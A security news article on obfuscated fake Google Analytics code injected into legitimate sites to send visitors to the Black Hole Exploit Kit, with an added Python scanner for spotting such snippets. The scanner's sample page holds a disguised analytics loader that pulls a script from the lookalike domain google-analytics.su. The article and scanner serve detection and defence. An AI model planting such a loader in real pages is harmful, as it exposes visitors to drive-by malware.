Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or so it appears to be legitimate code. The latest instance of this technique has seen attackers employing code that is meant to look like Google Analytics snippets, but instead sends victims off to a remote site that’s hosting the Black Hole Exploit Kit. Not the desired result.
Researchers at Websense discovered the ongoing attack recently, and found that the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it’s referring to common domains. But there are some tell-tale signs that this isn’t the case.
“It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to webmasters. Another hint is that they are using ‘UA-XXXXX-X’, a placeholder, as their ‘Google Analytics account’; obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more,” Websense’s Tim Xia wrote in an analysis of the attack campaign.
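The three tell-tale signs Xia lists (a lookalike host such as google-analytics[dot]su, the literal UA-XXXXX-X placeholder account, and an analytics snippet sitting at the top of the page rather than the bottom) are simple enough for a webmaster to check mechanically. The script below is an added example, not code from Websense or from this article: it pulls every script block out of a page, keeps the ones that resemble a Google Analytics snippet, and reports which of the three signs it finds. The allowlist of legitimate analytics domains, the "top of page" threshold, and the sample HTML page are all constructed assumptions for the demonstration.

```python
import re

# Registrable domains that legitimately serve Google Analytics. Any other
# domain whose name contains "google-analytics" is treated as a lookalike.
# (Assumption: this one-entry allowlist is enough for the demonstration.)
LEGIT_GA_DOMAINS = {"google-analytics.com"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# Captures "google-analytics.<tld>" (optionally a second label) so that
# google-analytics.su, google-analytics.com.example etc. are all extracted.
HOST_RE = re.compile(r"google-analytics\.[a-z]{2,}(?:\.[a-z]{2,})?", re.IGNORECASE)
# The literal placeholder account id the Websense note calls out.
PLACEHOLDER_ID_RE = re.compile(r"\bUA-X+-X\b")
# Strings that make a script block look like an analytics snippet at all.
GA_MARKERS = ("google-analytics", "_gaq", "UA-")
# A snippet starting in the first 30% of the document counts as "at the top"
# (assumption: the article only contrasts "top" with "bottom").
TOP_OF_PAGE_RATIO = 0.3


def looks_like_ga(tag: str) -> bool:
    """True if a <script> block resembles a Google Analytics snippet."""
    return any(marker in tag for marker in GA_MARKERS)


def lookalike_hosts(tag: str) -> list[str]:
    """Return every google-analytics-looking domain that is not on the allowlist."""
    found = set()
    for m in HOST_RE.finditer(tag):
        domain = m.group(0).lower()
        if domain not in LEGIT_GA_DOMAINS:
            found.add(domain)
    return sorted(found)


def scan_html(html: str) -> list[dict]:
    """Return one finding per analytics-like script that shows a suspicious sign."""
    findings = []
    total = max(len(html), 1)
    for m in SCRIPT_RE.finditer(html):
        tag = m.group(0)
        if not looks_like_ga(tag):
            continue
        reasons = []
        hosts = lookalike_hosts(tag)
        if hosts:
            reasons.append("lookalike host: " + ", ".join(hosts))
        if PLACEHOLDER_ID_RE.search(tag):
            reasons.append("placeholder account id (UA-XXXXX-X)")
        if m.start() / total < TOP_OF_PAGE_RATIO:
            reasons.append("analytics snippet near top of page")
        if reasons:
            findings.append({"offset": m.start(), "reasons": reasons})
    return findings


# Constructed sample page: a fake snippet in <head> pointing at a lookalike
# domain with the placeholder id, plus a normal-looking snippet at the bottom.
SAMPLE_PAGE = """<html><head><title>Constructed sample page</title>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXX-X']);
(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = 'http://www.google-analytics.su/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head><body>
<p>""" + "Page content. " * 200 + """</p>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-1234567-1']);
(function() {
  var ga = document.createElement('script');
  ga.src = 'https://ssl.google-analytics.com/ga.js';
  document.body.appendChild(ga);
})();
</script>
</body></html>"""


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(f"offset {finding['offset']}: " + "; ".join(finding["reasons"]))
```

The position check is the weakest of the three signs, since plenty of sites legitimately load analytics from the head, so treat a finding that carries only that reason as a prompt to look, not as a verdict. Because the injected code Websense saw was heavily obfuscated, the domain and account strings may not be visible in the raw HTML; running the scan over the page's rendered DOM (or over the decoded script) catches what a source-only scan misses.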
The end result of the infection routine is that the victim is passed off to a site that is hosting the Black Hole Exploit Kit, a notoriously nasty piece of software that will try a grab-bag of exploits against the victim’s browser until one works. Once that’s done, another piece of malware typically is installed on the user’s machine, perhaps a keylogger or banker Trojan designed to relieve the victim of her money.
Black Hole is one of several readily available exploit kits that attack crews of all makes and models use to install malware on thousands of machines. Black Hole, along with other kits such as Eleonore and Siberia, gives attackers a built-in set of exploits that can be used to go after vulnerabilities in browsers such as Internet Explorer, Firefox and Chrome. Last spring, a version of Black Hole was uploaded to some file-sharing sites and made available for free. At the time, researchers said that they expected Black Hole to be used in more attacks going forward, and that prediction has been borne out.
“If the ZeuS leak was like giving a machine gun for free, giving away exploit kits is like providing the ammo. We will now see much more use of those exploit and malware kits by less talented groups of cyber criminals,” Aviv Raff, CTO at security firm Seculert, said at the time of the leak of the free version of Black Hole.